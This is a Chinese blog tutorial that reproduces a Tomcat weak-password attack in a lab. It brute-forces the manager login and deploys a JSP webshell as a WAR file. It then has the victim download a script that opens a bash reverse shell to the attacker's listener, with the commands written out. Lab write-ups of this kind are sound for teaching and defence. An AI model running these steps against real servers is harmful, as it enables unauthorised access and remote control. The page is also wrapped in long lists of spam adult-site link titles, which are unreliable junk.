日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区

您的位置:首頁技術文章
文章詳情頁

Tomcat弱口令復現(xiàn)及利用(反彈shell)

瀏覽:391日期:2023-03-19 16:52:04
目錄
  • 漏洞描述
  • 復現(xiàn)
    • 環(huán)境
    • 攻擊流程
  • 利用
    • msf利用
    • 反彈shell利用
  • 參考文章

    漏洞描述

    Tomcat有一個管理后臺,其用戶名和密碼在Tomcat安裝目錄下的conf\tomcat-users.xml文件中配置,不少管理員為了方便,經常采用弱口令。Tomcat 支持在后臺部署 war 文件,可以直接將 webshell 部署到 web 目錄下。其中,欲訪問后臺,需要對應用戶有相應權限。
    Tomcat7+ 權限分為:
    manager(后臺管理)

    manager-gui 擁有html頁面權限
    manager-status 擁有查看status的權限
    manager-script 擁有text接口的權限,和status權限
    manager-jmx 擁有jmx權限,和status權限
    host-manager(虛擬主機管理)

    admin-gui 擁有html頁面權限
    admin-script 擁有text接口權限
    二、漏洞影響
    Tomcat <= 6.0.0 默認用戶名為admin,密碼為空,無暴力破解限制。
    Tomcat >= 6.0.0 無默認用戶,五次失敗后,賬戶即被鎖定。
    但是正常安裝的情況下,tomcat8 中默認沒有任何用戶,且 Manager 頁面只允許本地 IP 訪問。只有管理員手工修改了這些屬性的情況下,才可以進行攻擊。

    復現(xiàn)

    環(huán)境

    一臺攻擊機(kali-2021)192.168.141.190
    受害機(vulhub搭建的)192.168.141.194
    一臺用來下載反彈shell腳本的服務器(內網(wǎng),如果有服務器更好)192.168.141.128(利用時讓受害主機下載shell文件實現(xiàn)反彈shell)

    攻擊流程

    按照前人經驗可以使用burpsuite進行爆破或者使用msf進行爆破
    首先是根據(jù)burpsuite進行爆破:
    抓取請求數(shù)據(jù)包可以看到

    =其中沒有看到熟悉的賬號密碼,但是其中’Authorization: Basic dG9tY2F0OnRvbWNhdA=='將其中的base64字符串解密可以看到結果格式為"tomcat:tomcat"所以將請求包送至爆破模塊,構造格式為x:x的payload

    結果中的200即為成功,但是前面說明了tomcat8或有防爆破機制,當一個用戶名登錄超過五次就會鎖定賬戶,網(wǎng)上有說要用"tomcat暴破圖形化—繞過tomcat 6/7/8的防暴破機制"這個腳本來繞過但是作者沒有找到免費的,就不測試了.
    其次使用過msf進行爆破

    msf中找到上面的模塊配置出options的rhosts和rport就可以進行爆破(run)了

    可以看到用戶名和密碼在都是tomcat的時候爆破成功,而且可以看到msf應該是自帶了繞過防爆破腳本,而且可以通過自定義user和password文件進行測試,所以作者更推薦使用msf爆破方式

    利用

    msf利用

    這里強調一下,在作者復現(xiàn)網(wǎng)上說的使用exploit/multi/http/tomcat_mgr_deploy但是在配置好rhoss和rport進行run的時候出現(xiàn)無法拿到shell問題

    所以作者使用了exploit/multi/http/tomcat_mgr_upload進行利用配置同deploy,配置httpusername,httppassword,rhosts.rport 然后運行拿到shell

    反彈shell利用

    整體思路:首先在網(wǎng)頁端登錄進管理后臺上傳jsp后門文件,然后訪問這個jsp后門即可,雖然上傳之后就可以通過shell軟件控制,但是為了復習反彈shell的過程,作者將進一步通過上傳的jsp一句話木馬(也可以上傳大馬)進行反彈shell.

    首先將一句話shelloneword.jsp(一句話木馬文件)通過命令,jar cvf shelloneword.war shelloneword.jsp 執(zhí)行成功后在管理后臺找到如下然后上傳

    成功之后可以在這看到結果

    之后通過各種軟件訪問http://192.168.141.194:8080/shelloneword/shelloneword.jsp?i= xxxx就行了

    但是作者的方式是通過讓受害主機訪問服務器主機下載shell文件,進行反彈shell,所以前面只是中間過程,首先讓受害主機執(zhí)行i=curl -o /shell.sh http://192.168.141.128/shell.txt 其中shell.txt文件內容為

    bash -i >& /dev/tcp/192.168.141.190/7777 0>&1

    將ip和端口改為自己的,然后打開nc 監(jiān)聽7777端口,訪問http://192.168.141.194:8080/shelloneword/shelloneword.jsp?i=bash /shell.sh

    反彈shell成功

    參考文章

    [1] https://blog.csdn.net/qq_33020901/article/details/98357659
    [2] https://blog.csdn.net/weixin_44037296/article/details/116376114
    [3] https://blog.csdn.net/qq_43665434/article/details/116903953
    [4] https://www.cnblogs.com/henry666/p/14379888.html
    [5]https://www.cnblogs.com/qianxinggz/p/13440366.html
    [6]https://blog.csdn.net/weixin_42432317/article/details/90208213

    到此這篇關于Tomcat弱口令復現(xiàn)及利用(反彈shell)的文章就介紹到這了,更多相關Tomcat弱口令復現(xiàn)內容請搜索以前的文章或繼續(xù)瀏覽下面的相關文章希望大家以后多多支持!

    標簽: Tomcat
    日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区
    中文字幕av亚洲精品一部二部| 精品视频91| 欧美日本一区| 91麻豆精品| 日本一区二区三区视频在线看| 亚洲一区二区免费看| 里番精品3d一二三区| 日韩高清在线不卡| 国产探花在线精品一区二区| 青青草伊人久久| 久久超级碰碰| 成人片免费看| 国产伊人精品| 老鸭窝亚洲一区二区三区| 亚洲精品综合| 精品色999| 亚洲一级网站| 天堂久久av| 欧美aⅴ一区二区三区视频| 激情综合五月| 欧美丝袜一区| 噜噜噜久久亚洲精品国产品小说| 五月精品视频| 日本成人在线不卡视频| 国产无遮挡裸体免费久久| 麻豆国产精品777777在线| 97国产成人高清在线观看| 精品一区在线| 日本伊人久久| 国内精品亚洲| 国产亚洲永久域名| 国产精品香蕉| 狠狠操综合网| 美女视频一区在线观看| 亚洲欧美久久久| 91青青国产在线观看精品| 国产高清一区| 精品成人18| 91精品日本| 欧美不卡在线| 精品资源在线| 蜜桃久久久久久久| 成人精品天堂一区二区三区| 午夜电影一区| 青青久久av| 91麻豆精品| 亚洲精品va| 麻豆精品av| 欧美/亚洲一区| 日韩精品久久理论片| 成人精品视频| 免费毛片在线不卡| 日韩高清不卡一区| 91精品精品| 四季av一区二区凹凸精品| 欧美一区免费| 91亚洲精品在看在线观看高清| 亚洲一区二区日韩| 自拍日韩欧美| 精品一区三区| 国产精品日韩久久久| 欧美日韩国产高清电影| 亚洲第一精品影视| 日本久久成人网| 一本大道色婷婷在线| 丰满少妇一区| 精品视频高潮| 老司机免费视频一区二区| 美女久久久久久| 日韩综合精品| 欧美另类专区| 日本一区福利在线| 日本aⅴ亚洲精品中文乱码| 日韩一区二区三区精品视频第3页| 综合欧美亚洲| 国产精品红桃| 国产理论在线| 亚洲一级影院| 亚洲va久久久噜噜噜久久| 视频一区日韩精品| 国产精品久久久亚洲一区| 91精品丝袜国产高跟在线| 免费在线日韩av| www.com.cn成人| 亚洲欧美日本国产专区一区| 日韩精品午夜视频| 国产一区二区三区四区| 91成人精品视频| 91综合久久爱com| 日韩在线观看不卡| 亚洲人成精品久久久| 精品国产亚洲一区二区三区在线| 99精品在线观看| 欧美精品国产一区| 久久五月天小说| 国产精品伦一区二区| 91精品亚洲| 日韩欧美在线精品| 亚洲精品在线影院| 日韩不卡手机在线v区| 久久久噜噜噜| 国产欧美69| 麻豆91精品| 日韩免费福利视频| 国产欧美日韩一区二区三区在线| 成午夜精品一区二区三区软件| 视频一区二区三区在线| av综合电影网站| 国产精品密蕾丝视频下载| 日韩中文字幕区一区有砖一区 | 久久激情婷婷| 久久国产视频网| 国产精品日韩欧美一区| 国产探花在线精品一区二区| 99国产精品| 99tv成人| 日本久久成人网| 精品一区电影| 美女视频免费精品| 国产欧美日韩视频在线| 一区二区国产在线观看| 99精品视频精品精品视频| 国产精品99精品一区二区三区∴| 视频一区二区三区入口| 在线日韩一区| 美女少妇全过程你懂的久久| 精品亚洲美女网站| 亚洲天堂一区二区| а√天堂8资源中文在线| 九九久久国产| 狠狠久久伊人| 福利一区和二区| 精品视频91| 黄色在线网站噜噜噜| 国产99在线| 香蕉久久99| 国产午夜精品一区二区三区欧美 | 亚洲影院天堂中文av色| 在线免费观看亚洲| 免费观看在线色综合| 蜜桃视频在线观看一区二区| 亚洲精品视频一二三区| 日本不卡视频在线观看| 国产精品久久久一区二区| 九九久久国产| 天堂√8在线中文| 亚洲福利免费| 在线日韩成人| 免费在线欧美黄色| 99久久精品网站| 久久国产高清| 国产精品久久| 欧美日韩一二三四| 亚洲精品欧美| 成午夜精品一区二区三区软件| 日韩视频精品在线观看| 欧美午夜网站| 欧美日韩一二三四| 国产亚洲电影| 99pao成人国产永久免费视频| 国产欧美啪啪| 在线天堂中文资源最新版| 91精品啪在线观看国产18| 亚洲精品一区二区在线播放∴| 精品国产一区二区三区噜噜噜| 99视频+国产日韩欧美| 欧美极品一区二区三区| 亚洲欧洲一区| 日韩成人a**站| 亚洲毛片一区| 亚洲一区观看| 日韩精品一区二区三区免费观影 | 日韩视频久久| 国产精品草草| 免费国产自线拍一欧美视频| 国产亚洲电影| 91精品国产成人观看| 国产欧美视频在线| 午夜视频一区二区在线观看| 日产精品一区二区| 欧美日韩a区| 亚洲久草在线| 一本色道精品久久一区二区三区| 成人影视亚洲图片在线| 国产精品一区免费在线| 亚洲深深色噜噜狠狠爱网站 | 国产福利91精品一区二区| 国产亚洲高清在线观看| 亚洲精品123区| 一区免费视频| 亚洲精品午夜av福利久久蜜桃| 欧美精品第一区| 国产精品2023| 国产精品视频一区视频二区| 亚洲字幕久久| 午夜久久av | 狠狠色综合网| 香蕉精品久久| 国产精品人人爽人人做我的可爱| 成人久久一区|